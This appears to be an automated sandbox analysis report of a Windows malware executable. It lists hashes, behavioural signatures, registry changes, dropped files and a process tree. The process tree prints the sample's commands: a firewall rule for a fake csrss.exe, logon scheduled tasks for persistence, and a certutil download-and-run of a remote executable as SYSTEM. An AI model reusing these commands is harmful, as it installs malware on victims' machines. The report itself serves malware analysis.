Analysis
-
max time kernel
80s -
max time network
204s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
24-05-2022 01:22
Static task
static1
Behavioral task
behavioral1
Sample
5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
Resource
win7-20220414-en
General
-
Target
5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe
-
Size
3.8MB
-
MD5
2398437ccc44c1423def15077c7e0b87
-
SHA1
f6d5d7c86644c30dde8321b73e1714fb1896efe1
-
SHA256
5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01
-
SHA512
4982c3e50834aa01a1c80142cc70aa254e9323dfea01c8d140d7ada43d4e3b04dedded5fdb9e9a0c125a08210267d216cd7c48c26e5f1329c0afe24ea9ec698f
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 2004 bcdedit.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1956 schtasks.exe 1356 schtasks.exe -
Modifies data under HKEY_USERS 17 IoCs
Processes:
netsh.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exepid process 2012 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe 1172 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exedescription pid process Token: SeDebugPrivilege 2012 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe Token: SeImpersonatePrivilege 2012 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.execmd.exedescription pid process target process PID 1172 wrote to memory of 1496 1172 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe cmd.exe PID 1172 wrote to memory of 1496 1172 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe cmd.exe PID 1172 wrote to memory of 1496 1172 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe cmd.exe PID 1172 wrote to memory of 1496 1172 5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe cmd.exe PID 1496 wrote to memory of 1140 1496 cmd.exe netsh.exe PID 1496 wrote to memory of 1140 1496 cmd.exe netsh.exe PID 1496 wrote to memory of 1140 1496 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe"C:\Users\Admin\AppData\Local\Temp\5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe"C:\Users\Admin\AppData\Local\Temp\5490b6a9acf728581c0ed54fc1e73b6b512eacbe2897c65e11918a27e5181e01.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524032326.log C:\Windows\Logs\CBS\CbsPersist_20220524032326.cab1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
795KB
MD557886526408d918d2504af120438e2d3
SHA14f0bee6f65304ccbd6a02e496b3a8dda21f92113
SHA256ae5d22b49be7d31cfa2118f1ce758fcaa9bbaf47c7332345c3ee5f104bdb5be7
SHA512b305d001e96dd25d148fc6a82dee19cdd2845e8360cc67bd2a21679e8e8d623b38f405fcfe62f973c77620be51d957b52fa40fb96823a165b6fb684041d701af
-
C:\Windows\rss\csrss.exeFilesize
1.5MB
MD503ff8f3407b37a8738feb2a6d44023e0
SHA1f013118644391424d27d370f34a3588b16cd442d
SHA256743bda3d297a05158986d3b65d9434f89247e2430f226d0a2c2f7c8ead9f2f50
SHA512432f2be7cd67e1b240eb01e382f65361ffa68d39aaaa37a76fa7af620e5a66beba61b88d510ed0b27a472efc75fbcf72f92b95b142849271adc15398e5bd0171
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1007KB
MD5fee1361b94fc5e9534a5f29dec8390d0
SHA10f31dc67981c847b04bd89f0203244321aaec84d
SHA25609869a001cd8b2af88e67435090a7d4d67c8d8809c49e0d47345fc0a5d029cf5
SHA5127df763320913891766151205f5298df15aea0256d7123f5909626404f8f24a922caaa200126a959e69e819fe1378d00d983d536efde59be091ac46094d6796fb
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
926KB
MD54c1afc296029cc07b0b671623a4646d5
SHA14327258826ceed3bb71175b9f3149fddb644786d
SHA25646f58250810e5affaa86a45b9e70e2b91db2e6e10c013df38939046cb9b9e08c
SHA5129b73ccfe1468acb7ca2d33832f2d09e29e71529af627417284f52e9f62078dfed384cb149810fa068b60837b15dfb6bc770ab887ccef97d104567d4f39971d99
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
999KB
MD5f953111ce08297064a5a85e53680774e
SHA1c51d7ef2f14aab027c39ed41e17be18197be8b80
SHA256756fd97d974a0d084ad201029a141c05929e84dd2ca52b9ac75a3e10d7e1999b
SHA512ea097e367c7e80afab0947c80772ee20a3d0959011877a41d1fca8bed29e933399c6a59d4154b4df98d4c073a79b89c2a84cfca032e078054587670afd58a69d
-
\Users\Admin\AppData\Local\Temp\dbghelp.dllFilesize
902KB
MD5003454e0ce154f7707b47bc8bd8ca901
SHA1751b3e6a0be4e973a5e3750dcf260e2d3ff85258
SHA2562cd4170a79fb58fba1c72bdb1cfa4ee79dbbc15284be14c28549b6e85f604df3
SHA512b2091cfcdb795f84dddc938c44ea1dbe9fbe17a6275d37fdfd546fd0fae11bb3067470983c652c568d47bc4fb8d8f1920567f78ebcf7cba2439849bc61b00227
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
923KB
MD556ec65dca9e2cc458bd94d4d0a184d91
SHA11d2afff104337ee20e6244e81156b61e3dd6202c
SHA256bd2a9e2d148a86580bc158b2c283c18153344b3d808cf1f17f75f11382ba450e
SHA51218d447609b2771718b633f9ff5af75ef7e68c1a38229d172fc858129cd4ffae85b276deb7bbb1bbe5b1c86f4ee047d7e0555b6a7b4c53538ab8793905278b794
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
1.0MB
MD59d75bb89e415a6e0c5255dad7e395ee7
SHA1747e50b4ddf79aa77a305440e2b9f6a2d9c001d0
SHA2562c84a9d343a7f953c205c5906579e63fc02ca03ebec7d639802bef90114f27ea
SHA5121a6e5fa21c7fb7bb5b349d6e52f8b8265a773b722f0a7e098aa1b472996004987e3fe677a6fde1c72a56400558347060676461a0d2ae47759015fa86d3e0d252
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
923KB
MD5ad460861b380b9b79d6f31fe0b0c7135
SHA1d0750cb286597e1864829f81433214434ab0d653
SHA256f59ee6e28dc2a24769ef33f056d73b9a87f58861688e0b4753b9e17921bfe1f1
SHA512990a1083b9e153ec274bbcf59ea07106d0a29399262a58062e6662488b0f552be30af1949df0574d3d6b29d0a731249110cc8ab3e05ffb4df47471310b0e476d
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
568KB
MD5d8f361a365a5add07a58e0a74b65ddbc
SHA132bbe3f2646e123bf32349537866e976884aced1
SHA2568e6b2343e9f1156c93129def93326d2c4ad248f134722ec8179fbdac489313ef
SHA512a08071e2a4ad2c2a87ee17df3cc693c921bfc14b76ba56e805be00e717ed7d019a2e7db4216c78fda2de299706b64020a28a1df28a783be42c968b0bf5e9bab3
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\symsrv.dllFilesize
163KB
MD55c399d34d8dc01741269ff1f1aca7554
SHA1e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA5128ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d
-
\Windows\rss\csrss.exeFilesize
1.2MB
MD5790ad2db8365c5a6c221c296452e1b5a
SHA191617ef70e86fb44c8bf2fc56d4313fa08400767
SHA25695f3527645db675b9632fefb2ad1f927021a9bbcada929eafefd1d98680f503c
SHA512a7d1134f9f836b13400805c7a289b90c98581d68dce73263c6dbc58ee2a5a8e1ae0e13d9e1a3fa5b669ef0063104c0a8ba45fab6afde402cb7f7f3a7f9f43e44
-
\Windows\rss\csrss.exeFilesize
1.4MB
MD5e7c18e3437e3cc005c76f2758f4c546e
SHA12accb610956b34604afd06539a3ee0013859bb2a
SHA2569d2389038371e308a10521366d5f2d97947ef9e1815db66f2d58e871767ed39a
SHA512d8b270d58632899f1c34ec62a64cf8d9649865447aa4fa60888fef7997d10be2d06b4fbdd4a9d4b89c93939dc91332e790219a85525e7d0d0e7b0b80df7c1926
-
memory/1140-63-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmpFilesize
8KB
-
memory/1140-62-0x0000000000000000-mapping.dmp
-
memory/1172-60-0x0000000000400000-0x000000000313E000-memory.dmpFilesize
45.2MB
-
memory/1172-59-0x00000000036A0000-0x0000000003A46000-memory.dmpFilesize
3.6MB
-
memory/1172-58-0x00000000036A0000-0x0000000003A46000-memory.dmpFilesize
3.6MB
-
memory/1204-68-0x0000000003380000-0x0000000003726000-memory.dmpFilesize
3.6MB
-
memory/1204-70-0x0000000000400000-0x000000000313E000-memory.dmpFilesize
45.2MB
-
memory/1204-69-0x0000000003380000-0x0000000003726000-memory.dmpFilesize
3.6MB
-
memory/1204-66-0x0000000000000000-mapping.dmp
-
memory/1496-61-0x0000000000000000-mapping.dmp
-
memory/2004-84-0x0000000000000000-mapping.dmp
-
memory/2012-54-0x0000000003400000-0x00000000037A6000-memory.dmpFilesize
3.6MB
-
memory/2012-57-0x0000000000400000-0x000000000313E000-memory.dmpFilesize
45.2MB
-
memory/2012-56-0x00000000037B0000-0x0000000003EA5000-memory.dmpFilesize
7.0MB
-
memory/2012-55-0x0000000003400000-0x00000000037A6000-memory.dmpFilesize
3.6MB